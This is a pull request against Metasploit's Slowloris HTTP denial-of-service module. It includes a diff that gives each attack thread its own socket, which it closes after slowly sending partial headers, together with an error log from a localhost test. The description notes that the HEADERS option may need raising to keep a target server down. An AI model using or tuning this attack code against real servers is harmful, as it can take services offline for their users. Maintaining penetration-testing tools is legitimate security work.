### PR TITLE
Close sockets to resolve file handle error

### DIFF
--- a/modules/auxiliary/dos/http/slow_loris.rb
+++ b/modules/auxiliary/dos/http/slow_loris.rb
@@ -60,13 +60,14 @@ class MetasploitModule < Msf::Auxiliary
         1.upto(thread_count) do |i|
           threads << framework.threads.spawn("Module(#{self.refname})-request#{(starting_thread - 1) + i}", false, i) do |i|
             begin
-              connect()
-              sock.puts(header)
+              current_sock = connect(global=false)
+              current_sock.puts(header)
               headers.times do
                 data = "X-a-#{rand(0..1000)}: b\r\n"
-                sock.puts(data)
+                current_sock.puts(data)
                 sleep rand(1..timeout)
               end
+              disconnect(nsock=current_sock)
             end
           end
         end


### PR DESCRIPTION
When testing and letting the module run for a large number of requests the module fails because the socket handles are not closed and it ends up opening too many. This PR closes each thread's socket after it finishes writing the specified number of headers.

Note, you may need to increase the default value for the `HEADERS` option to keep the server down after this change.

Error:
```
[-] 127.0.0.1:8000 - Auxiliary failed: Errno::ENFILE Too many open files in system - socket(2)
[-] 127.0.0.1:8000 - Call stack:
[-] 127.0.0.1:8000 -   ...lib/ruby/gems/2.4.0/gems/rex-socket-0.1.9/lib/rex/socket/comm/local.rb:169:in `initialize'
[-] 127.0.0.1:8000 -   ...lib/ruby/gems/2.4.0/gems/rex-socket-0.1.9/lib/rex/socket/comm/local.rb:169:in `new'
[-] 127.0.0.1:8000 -   ...lib/ruby/gems/2.4.0/gems/rex-socket-0.1.9/lib/rex/socket/comm/local.rb:169:in `create_by_type'
[-] 127.0.0.1:8000 -   ...lib/ruby/gems/2.4.0/gems/rex-socket-0.1.9/lib/rex/socket/comm/local.rb:33:in `create'
[-] 127.0.0.1:8000 -   ...lib/ruby/gems/2.4.0/gems/rex-socket-0.1.9/lib/rex/socket.rb:49:in `create_param'
[-] 127.0.0.1:8000 -   ...lib/ruby/gems/2.4.0/gems/rex-socket-0.1.9/lib/rex/socket/tcp.rb:37:in `create_param'
[-] 127.0.0.1:8000 -   ...lib/ruby/gems/2.4.0/gems/rex-socket-0.1.9/lib/rex/socket/tcp.rb:28:in `create'
[-] 127.0.0.1:8000 -   /rapid7/metasploit-framework/lib/msf/core/exploit/tcp.rb:102:in `connect'
[-] 127.0.0.1:8000 -   /rapid7/metasploit-framework/modules/auxiliary/dos/http/slow_loris.rb:63:in `block (3 levels) in run'
[-] 127.0.0.1:8000 -   /rapid7/metasploit-framework/lib/msf/core/thread_manager.rb:100:in `block in spawn'
[*] Auxiliary module execution completed
```